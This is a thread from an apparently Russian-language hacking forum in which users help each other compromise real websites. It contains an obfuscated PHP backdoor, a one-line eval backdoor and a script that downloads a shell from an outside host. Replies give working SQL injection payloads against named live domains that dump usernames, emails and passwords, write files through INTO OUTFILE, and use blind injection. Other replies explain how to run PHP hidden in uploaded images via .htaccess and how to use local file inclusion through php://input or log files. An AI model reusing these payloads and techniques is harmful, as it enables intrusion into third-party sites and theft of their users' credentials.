eval(gzinflate(base64_decode("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 5Iwbe0Y0z+x8QM6B59/AA==")));

Плагины удалил, не помогло. Можно ли это исправить?

модераторам: Прошу до завтрашнего вечера не удалять

Fooog said:
Проблема с заливкой шелла на vb.
Всё делаю как надо, ajax.php выдает всё ок, но когда захожу по пути где должен быть шелл, его там не оказывается, а просто открывается главная стр. сайта. либо 404 (зависит от сайта)
Код:

Code:
$linky="http://ololo.com/papka/ld.txt";
$saved="./name.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
echo 'done';
fclose($from);

Возможно проблема в том, что обнаружил в плагинах кого то до меня.
2 плагина с такими кодами:

Code:
eval($_REQUEST[cmd123]);

и

Code:
eval(gzinflate(base64_decode("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 5Iwbe0Y0z+x8QM6B59/AA==")));

Плагины удалил, не помогло. Можно ли это исправить?
модераторам:
Прошу до завтрашнего вечера не удалять


/showpost.php?p=2878106&postcount=18342

/showpost.php?p=2878121&postcount=18344

/showpost.php?p=2878125&postcount=18345

Boolean, в таком случае ajax.php должен был выбить ошибку, а не то что всё ок.

Я тоже думал что мб это в этом проблема, но проверил кучу папок, а результат тот же.

Fooog said:
Boolean
, в таком случае ajax.php должен был выбить ошибку, а не то что всё ок.
Я тоже думал что мб это в этом проблема, но проверил кучу папок, а результат тот же.


Он выкинет если разрешено.

error_reporting(E_ALL);

ini_set('display_errors', '1');

может быть такое, что в information schema не хранятся данные для доступа (логин, пароль)?

evge_mir said:
может быть такое, что в information schema не хранятся данные для доступа (логин, пароль)?


Они там никогда не хранятся. Читайте мануалы.

Сорри, если вопрос очень нубский.

У меня следующего плана вопрос.

В общем имеется скрипт, который аплоадит картинки на сервер - профильные аватарки.В картинку, которую я залил, я вставил php код, а в папке, которую аплоадятся аватарки, отсутствует .htaccess, но тем не менее скрипт не дает заливать файлы с расширением php.Можно ли каким-либо образом исполнить php код из картинки ?

Залитая картинка полностью функциональна при этом

t3cHn0iD said:
Сорри, если вопрос очень нубский.
У меня следующего плана вопрос.
В общем имеется скрипт, который аплоадит картинки на сервер - профильные аватарки.В картинку, которую я залил, я вставил php код, а в папке, которую аплоадятся аватарки, отсутствует .htaccess, но тем не менее скрипт не дает заливать файлы с расширением php.Можно ли каким-либо образом исполнить php код из картинки ?
Залитая картинка полностью функциональна при этом


Ну если на есть LFI уязвимости, то можно проинклудить картинку.

Не совсем понял причем тут .htaccess, когда _скрипт_ не дает заливать файлы с расширением .php.

Он и не должен был бы препятствовать этому.

Попробуй сам загрузить .htaccess:

AddType application/x-httpd-php .jpg

И позже заливать .jpg шелл.

Или пробуй .php5 и так далее.

http://rumafia.com/news.php?id=232

не могу вывести таблици помогите

Там две БД.

http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_schema,6,7,8,9,10,1 1,12,13,14,15,16+from+information_schema.tables+--+

Вывод таблиц

http://rumafia.com/news.php?id=-232+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16+from+information_schema.tables+--+

Такая ситуация . как можно вывести данные из таблиц в сортировке с 1й записи. , а то выводиться все с 166 позиции. ???

как то пример

---articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.наван ие_таблицы--+

namez2 said:
Такая ситуация . как можно вывести данные из таблиц в сортировке с 1й записи. , а то выводиться все с 166 позиции. ???
как то пример
---articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.наван ие_таблицы--+


Так выводил?


---articles.html?id=7'+union+select+1,2,(select(@x)fr om(select(@x:=0x00),(select(0)from(база.нав ание_таблиц ы)where(0x00)in(@x:=concat(@x,0x3c62723e, id,0x3a, name,0x3a, email,0x3a, passwd))))x),4,5 --+

namez2 said:
Такая ситуация . как можно вывести данные из таблиц в сортировке с 1й записи. , а то выводиться все с 166 позиции. ???
как то пример
---articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.наван ие_таблицы--+


ORDER BY `id` ASC

er9j6@ said:
Так выводил?


Что то не получается так

http://goldsauna.ru/articles.html?id=7'+union+select+1,2,(select(@x)fr om(select(@x:=0x00,(select(0)from(goldsauna.users) where(0x00)in(@x:=concat(@x,0x3c62723e,id,0x3a,nam e))))x),4,5--+

и зачем в конце x между скобками?

---

ORDER BY `id` ASC -а как это подставлять перед id? или где почитать можно по этому поводу?

namez2 said:
Что то не получается так
http://goldsauna.ru/articles.html?id=7'+union+select+1,2,(select(@x)fr om(select(@x:=0x00,(select(0)from(goldsauna.users) where(0x00)in(@x:=concat(@x,0x3c62723e,id,0x3a,nam e))))x),4,5--+
и зачем в конце x между скобками?
---
ORDER BY `id` ASC -а как это подставлять перед id? или где почитать можно по этому поводу?


--articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.наван ие_таблицы+ORDER+BY+id+ASC+--+

Boolean said:
--articles.html?id=-7'+union+select+1,2,(group_concat(id,0x3b,name,0x3 b,email,0x3b,passwd)),4,5+from+база.наван ие_таблицы+ORDER+BY+id+ASC+--+


странно.. от подстановки ORDER+BY+id+ASC+--+

сортировки по id нет.

namez2 said:
странно.. от подстановки ORDER+BY+id+ASC+--+
сортировки по id нет.


Сортировка есть, по любому.

N, N+1, N+2, N+3

Не обязательно, что N = 1.

Boolean said:
Сортировка есть, по любому.
N, N+1, N+2, N+3
Не обязательно, что N = 1.


а как можно сделать чтоб было N=0

т.е. считалось id от нуля?

namez2 said:
а как можно сделать чтоб было N=0
т.е. считалось id от нуля?


Ну если их там нет, то откуда им взяться?

Записи с id 1, 2,3 и т.п. вполне могли быть удалены.

Boolean said:
Ну если их там нет, то откуда им взяться?
Записи с id 1, 2,3 и т.п. вполне могли быть удалены.


Да нет они там есть. я знаю точно. сейчас обосную.

При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22....

пример

--ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4 ,5+from+goldsauna.users+ORDER+BY+id+ASC+--+

а при двойном запросе с добавлением name например,

выводиться уже с позиции 166

namez2 said:
Да нет они там есть. я знаю точно. сейчас обосную.
При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22....
пример
--ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4 ,5+from+goldsauna.users+ORDER+BY+id+ASC+--+
а при двойном запросе с добавлением name например,
выводиться уже с позиции 166


а чем вас не устраивает limit?


_http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,concat_ws(0x3a,id),4,5+from+go ldsauna.users+limit+0,1+--+


и с подобными вопросами наверное лудше было бы запостить в разделе по БД а не уязвимостей.

_/thread62769.html

пытаюсь править индекс, вставляю код, нажимаю save сайт выдает


Method Not Implemented
POST to /photo/ll.php not supported.
Apache bla-bla-bla version Server at *** Port 80


что делать? есть ли шеллы использующие метод ГЕТ?

vaddd said:
что делать? есть ли шеллы использующие метод ГЕТ?


Не поможет. Это обычный firewall так реагирует на левые данные в REQUEST запросах.

Закодируй в base64 контент пост-запроса и запиши в файл уже раскодированный.

Так же часто промежуточный сервер блокирует такие данные, в том числе и с большим объёмом.

А вообще WSO постоянно использует POST(Шелл не работал бы вообще), а у GET длина ограничена(Не получиться передать нужный объём).

как залить шелл на ipb>3 ?

доступ в админку есть

crackforme said:
как залить шелл на ipb>3 ?
доступ в админку есть


/threadnav89112-1-10.html

_http://wero.ru/php/content.php?id=163' это sql иньекция?

DyukiN said:
_http://wero.ru/php/content.php?id=163' это sql иньекция?


да...

В чем ошибка ?


Code:
select '' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'

wkar said:
В чем ошибка ?

Code:
select '' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'



через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?

В админке есть SQL-менеджер, папка есть, файл прив тоже.

Может в том, что пыху не понятно, что такое cmd?

$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.

from mysql.user - нужно убрать вообще

Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1

Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100

http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1

как такое крутить?

vaddd said:
http://www.pmrs.ps/last/etemplate.php?id=249%20and%201=1
как такое крутить?


http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+

вот так вот и надо...как обычную

Gorev said:
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20+
вот так вот и надо...как обычную


ясно...

смутило это:


http://www.pmrs.ps/last/etemplate.php?id=249%20order%20by%20100500

Melfis said:
Может в том, что пыху не понятно, что такое cmd?
$_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо.


Глупости, отработает и так


Melfis said:
from mysql.user - нужно убрать вообще


Не всегда, только если mysql не старый.

wkar у тебя файл не создаётся, варианта три:

1 Нет прав на запись

2 Нет прав на операции с файлами (файлприва тоесть)

3 Путь не верный

--------

upd

Этого не заметил


wkar said:

Code:
Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1

Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100



А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )

Разьясните пожалуста что здесь не так?


Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+

ответ

The used SELECT statements have a different number of columns

и ошибка... union+select получается не работает?

namez2 said:
Разьясните пожалуста что здесь не так?

Code:
-ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+
все ок 92
далее ставлю
-ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+

ответ
The used SELECT statements have a different number of columns
и ошибка... union+select получается не работает?


ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?

если сам сайт, то пропробуй +GROUP+BY+95+--+

там полей может быть больше 92

stepashka_ said:
ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается?
если сам сайт, то пропробуй +GROUP+BY+95+--+
там полей может быть больше 92


полей получается 92. (сайт виден)

вот запрос на 93 выдает (Unknown column '93' in 'group statement')

вот пример


Code:
http://www.mesta-vstrech.ru/mesto.php?id=1+GROUP+BY+93+--+

namez2 said:
полей получается 92. (сайт виден)
вот запрос на 93 выдает (Unknown column '93' in 'group statement')
вот пример

Code:
http://www.mesta-vstrech.ru/mesto.php?id=1+GROUP+BY+93+--+





Code:
Там под фильтр попадают скобки и запятые.
http://www.mesta-vstrech.ru/mesto.php?id=1%27+BEGIN:%201%20,%28%29+2+ENDFILTER



Code:
BEGIN: 1 2 ENDFILTER

Boolean said:

Code:
Там под фильтр попадают скобки и запятые.
http://www.mesta-vstrech.ru/mesto.php?id=1%27+BEGIN:%201%20,%28%29+2+ENDFILTER


Code:
BEGIN: 1 2 ENDFILTER



А как этим воспользоваться?

выдается ошибка по синтаксису.. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' BEGIN: 1 2 ENDFILTER LIMIT 1' at line 1

и как дальше составлять запрос через union select? что то как не составляю все никак...

namez2 said:
А как этим воспользоваться?
выдается ошибка по синтаксису.. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' BEGIN: 1 2 ENDFILTER LIMIT 1' at line 1
и как дальше составлять запрос через union select? что то как не составляю все никак...


Говорю же, скобки и запятые попадают под фильтр.

ничего уже не поможет?

пробовал захешировать запятые. все равно эффекта 0

namez2 said:
ничего уже не поможет?
пробовал захешировать запятые. все равно эффекта 0


Что толку их кодировать то, все равно массив $_GET/$_REQUEST автоматически декодируется.

Человеки, я не силен в php инклудах..

Подскажите пожалуйста, как быть:

http://salut.kg/buyer.php?lang=lol

P.S:

allow_url_fopen = On

allow_url_include = Off

помогите роскрутить sql

sidbank.pl/index.php?option=com_virtuemart&page=shop.browse&category_id=116&Treeid=3&Itemid=100003&lang=en&vmcchk=1&Itemid=100003'

роскручивал havj не мог найти хеши админа помогите пожалуйста

=strelok= said:
sidbank.pl/index.php?option=com_virtuemart&page=shop.browse&category_id=116&Treeid=3&Itemid=100003&lang=en&vmcchk=1&Itemid=100003'
роскручивал havj не мог найти хеши админа помогите пожалуйста


помогаю:

/thread43966.html

/thread50600.html

ne0k said:
Человеки, я не силен в php инклудах..
Подскажите пожалуйста, как быть:
http://salut.kg/buyer.php?lang=lol
P.S:
allow_url_fopen = On
allow_url_include = Off


Пробуй инклудить php://input и в тело POST запроса передавать код, который ты хочешь выполнить на сервере.

Или же ищи логи, access.logs апача, или логи фтп сервера, потом просто инклуд делай. Да что я расписываю то, куча мануалов на эту тему есть.

Есть сайтец, на нем у меня неполные права у текущего юзера. Есть файл другого пользователя с правами root, который я могу редактировать, но он html, смогу ли я как-то получить шелл этого пользователя? Если да, то как?

сделал @@version() вышло 5.1.41-3ubuntu12.10

кто-нибудь сталкивался с таким? какие дальнейшие действия?

crackforme said:
сделал @@version() вышло 5.1.41-3ubuntu12.10
кто-нибудь сталкивался с таким? какие дальнейшие действия?


Ну крути дальше.

Фильтруется либо @ либо ( и ), это как повезет.

Проверь @@version, если получишь результат тот же что и @@version(), то фильтруется скобки. Очевидно же.

Прошу помощи

инъекция вида:

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,

ответ:

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

И далее плохая новость ничего не выходит с числами, сколько бы не подставлял.

Но есть и хорошая

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0'

в конце кавычка и ответ уже:

Invalid query: The used SELECT statements have a different number of columns

Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу.

+ сайт с xss есть но об этом позже =)

если что сайт на Apache/2.2.17

ссылку покажи

Может немного не в той теме. Хотел узнать:

Какая программа проверяет ссылки на наличие скули, но не интересуют программы, которые просто ищут ошибку при подстановке " ' ".

Нужно нечто вроде sqlmap, но способная брать список из файла и не требующая никакого ввода от пользователя (скорость работы не особо важна, главное - качество :3)

Также устроит, если кто-нибудь подскажет как можно это осуществить через sqlmap

NetDevilz SQL Scanner в гугл пропиши

Blind SQL Injection

Добрый день уважаемые форумчане.

Помогите разобраться в чем проблема, замучился уже.

Суть проблемы:

Дергаю названия таблиц так:


Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+tab le_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)) )--

Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы.

Пошел дальше, получил списки всех таблиц.

одна из них users

Получаю название колонок:


Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+col umn_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TAB LE_NAME='users'+LIMIT+0,1)))--

Получил все нормально.

Теперь надо выдернуть значения.

Делаю так:


Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+pas s+from+users+LIMIT+0,1)))--

В ответ получаю:


Code:
mysql error: Unknown column 'pass' in 'field list'

Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass?

ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.

Мб захексишь?

Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+UNH EX(HEX(pass))+from+users+LIMIT+0,1)))--

Выдает:


Code:
mysql error: Unknown column 'pass' in 'field list'

Попробуй указать базу данных этой таблицы.

Всем Привет.Вытянул из базы логины и пароли юзеров,патюсь залогинится выдет такую ошибку


Fatal error: Uncaught exception 'Exception' with message '_doQuery: [Error message: Could not execute statement] [Last executed query: SELECT logged_in FROM users WHERE username = 'j' AND password = '5eb59a1c45ec8d0eafe705c45aa15ce1'] [Native code: 1054] [Native message: Unknown column 'logged_in' in 'field list'] ' in /home/marketing/emaxxtech.com/includes/functions.php:6 Stack trace: #0 /home/marketing/emaxxtech.com/login.php(14): error_handler(Object(MDB2_Error)) #1 {main} thrown in /home/marketing/emaxxtech.com/includes/functions.php on line 6


что это значит и можно ли как-то использовать?

p.s. только учусь по данной теме ,поэтому не судим строго,очень прошу..

Boolean said:
Попробуй указать базу данных этой таблицы.


аналогичная ситуация...

s000r said:
аналогичная ситуация...


Показывай ссылку, или в пм.

upd: все, решили, проблема была как я и сказал, в указателе на базу данных с этой таблицей.

Люди помогите с sql

Имеется SQL инъекция.

www.xxx.xx/title.php?id=-32+union+select+1

версия: 5.1.49

нашел таблицу members

в таблице есть колонки: username, password

пишу запрос:

www.xxx.xx/title.php?id=-32+union+select+username from members limit 0,1 ---- не выводится ничего и при limit 1,1 и 1,2

но при:

www.xxx.xx/title.php?id=-32+union+select+password from members limit 0,1 ---все пароли выводятся

В чем может быть проблема?

Einstein,

может просто нет username-ов?) Ссылку кинь в ПМ.

P.S. Попробуй UNHEX(HEX(username))

www.xxx.xx/title.php?id=-32+union+select+UNHEX(HEX(username))+from+members+ limit+0,1+--+

ай-яй.

Все получилось помогло вот что:

www.xxx.xx/title.php?id=-34+union+select+concat(username,char(58),password) ...---b все вывелось.

tabletkO спасибо, что откликнулся =)

Kuteke said:
NetDevilz SQL Scanner в гугл пропиши


не интересуют программы, которые просто ищут ошибку при подстановке " ' ".

Это ты видать не заметил, да?

Проблемка...

При выводе инфы из БД пишет Subquery returns more than 1 row

запрос:

?id=1+and(select+1+from(select+count(*),concat((se lect+2+from+users+limit+0,1),floor(rand(0)*2))x+fr om+users+group+by+x)a)+and+1=1

http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by%20123

как такое крутить? почему при order by 123 нет ошибки?

vaddd said:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by%20123
как такое крутить? почему при order by 123 нет ошибки?


http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by%20123+--+

vaddd said:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by%20123
как такое крутить? почему при order by 123 нет ошибки?


Тут Blind SQL

Крутить так:


Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+substring((version()),1,1)=4

4-ая версия. Печально.


Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((user()),1,1))=10 9

User = mup@localhost


Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((database()),1,1) )=112

Database = praca

Теперь подбирай таблички так:


Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+exists(select+count(*)+from+praca .НАЗВАНИЕ_ТАБЛИЧКИ)

Если страничка отобразится нормально - ты подобрал =)

Вот вам сорцы =)


PHP:
if ($this->is_valid_poll_id($poll_id)) {

$voted=$this->has_voted($poll_id);

$is_active=$this->is_active_poll_id($poll_id);

if ($action=="results"&&$poll_id==$poll_ident) {

return$this->view_poll_result($poll_id,0);

} elseif (!$is_active) {

return$this->view_poll_result($poll_id,0);

} elseif ($is_active&&$voted) {

return$this->view_poll_result($poll_id,1);





PHP:
functionis_valid_poll_id($poll_id) {

$poll_id=intval($poll_id);

if ($poll_id>0) {

$this->db->fetch_array($this->db->query("SELECT poll_id FROM ".$this->tbl['poll_index']." WHERE poll_id=$poll_idAND statusdb->record['poll_id']) ?true:false;

} else {

returnfalse;

}

}





PHP:
functionis_active_poll_id($poll_id) {

$poll_id=intval($poll_id);

$this->db->fetch_array($this->db->query("SELECT * FROM ".$this->tbl['poll_index']." WHERE (poll_id='$poll_id' AND status=1)"));

if (!$this->db->record) {

returnfalse;

} elseif ($this->db->record['expire']==0) {

returntrue;

}

return ($this->db->record['exp_time']poll_result_html[$poll_id]) || !isset($this->poll_result_html[$poll_id][$this->template_set])) {

$pollvars=$this->pollvars;

$row=$this->db->fetch_array($this->db->query("SELECT * FROM ".$this->tbl['poll_index']." WHERE (poll_id = '$poll_id')"));

if (!$row) {

return"";

}

$question=$row['question'];

$VOTE= ($vote_stat==1) ?$this->pollvars['voted'] :'';

$COMMENT= ($row['comments']==1) ?"template_set','$poll_id','width=230,height=320,too lbar=no,statusbar=no'))\">".$this->pollvars['send_com']."":'';

eval("\$result_html = \"".$this->get_poll_tpl("result_head")."\";");

$i=0;

$loop_html=$this->get_poll_tpl("result_loop");
